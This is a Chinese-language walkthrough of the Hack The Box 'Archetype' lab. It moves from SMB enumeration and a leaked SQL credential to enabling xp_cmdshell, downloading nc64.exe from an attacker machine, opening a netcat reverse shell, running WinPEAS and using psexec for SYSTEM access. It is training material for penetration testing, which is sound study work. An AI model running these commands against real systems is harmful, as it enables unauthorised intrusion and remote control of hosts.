Hack The Box - ArcheType

侦查(Reconnaissance)

在进行渗透测试时,初步侦查能够揭露目标系统的潜在弱点。本次分析中,我们发现目标伺服器开放了 SMB(Server Message Block)服务于 445 或 139 端口,并于 1433 端口运行 Microsoft SQL Server 2017

nmap -sC {TARGET_IP}

扫描结果确认了这些服务的可用性。

扫描(Scanning)

使用 smbclient 列举 SMB 共享资源

smbclient -N -L \\\\\\\\{TARGET_IP}\\\\

参数说明:

  • -N:不输入密码。
  • -L:列出目标伺服器上的共享资源。

$ 符号的意义

在 SMB 共享列表中,带有 $ 符号的名称表示这些是隐藏共享(Hidden Shares)。这类共享通常不会在一般的共享列表中显示,仅有具备适当权限的使用者才能存取。例如:

  • ADMIN$:Windows 预设的管理员共享,对应于 C:\\Windows 目录。
  • C$:Windows 预设的磁盘分割区共享(C 槽)。
  • IPC$:用于跨进程通讯的共享,允许网路上的应用程式存取特定的 Windows 服务。

在 Linux 中的 UNC 路径处理

在 Linux 环境中,反斜线 \\ 是跳脱字符(escape character),因此要正确表达 Windows 的 UNC 路径,必须使用双反斜线。例如:

  • Windows 标準写法:\\\\192.168.1.100\\Shared
  • Linux 终端表示:\\\\\\\\192.168.1.100\\\\Shared

这是因为 Linux 会将单一反斜线视为跳脱符,因此必须使用双反斜线来正确解析 UNC 路径。

入侵(Intrusion)

1. 存取 backups 共享资源

smbclient -N \\\\\\\\{TARGET_IP}\\\\backups

成功存取后,下载 prod.dtsConfig 档案:

get prod.dtsConfig

2. 入侵 MSSQL 伺服器

在 prod.dtsConfig 配置文件中,发现 SQL Server 使用者 sql_svc 的明文密码。

载入Impacket 工具包

Impacket 工具包含 mssqlclient.py

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install . --少这行后续SQL指令不会有Output

透过 mssqlclient.py 进行身份验证并存取 SQL Server

python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth

成功登入后,即可执行 SQL 查询与系统命令。

启用 xp_cmdshell 以执行系统命令

EXEC sp_configure \'show advanced options\', 1;
RECONFIGURE;
EXEC sp_configure \'xp_cmdshell\', 1;
RECONFIGURE;
EXEC xp_cmdshell \'whoami\';

xp_cmdshell 允许透过 SQL Server 执行 Windows 命令,需谨慎使用,避免潜在的安全风险。

3. 建立 Reverse Shell

传送 nc64.exe 到受害主机

  • 于本机下载 nc64.exe下载 nc64.exe

  • 于攻击机启动 HTTP 伺服器

    sudo python3 -m http.server 80

  • 于受害机下载 nc64.exe

    xp_cmdshell "powershell -c cd C:\\Users\\sql_svc\\Downloads; wget http://{攻击机IP}/nc64.exe -outfile nc64.exe"

    • 建立反向连线

  • 于攻击机开启监听

    sudo nc -nlvp 443

  • 于受害机执行 Reverse Shell

    xp_cmdshell "powershell -c cd C:\\Users\\sql_svc\\Downloads; .\\nc64.exe -e cmd.exe {攻击机IP} 443"

    • 提权(Privilege Escalation)

    1. WinPEAS扫描

    下载 WinPEAS.exe 到受害主机

    powershell wget http://{攻击机IP}/winPEASx64.exe -outfile winPEASx64.exe"

    开始扫描

    .\\winPEASx64.exe

    根据扫描结果,在C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt找到administrator的密码

    2. SMB连线

    使用 PsExec.py 提权

    python3 psexec.py administrator@{TARGET_IP}

    成功取得最高权限(SYSTEM)。

    取得 user.txt

    type C:\\Users\\sql_svc\\Desktop\\user.txt

    取得 root.txt

    type C:\\Users\\Administrator\\Desktop\\root.txt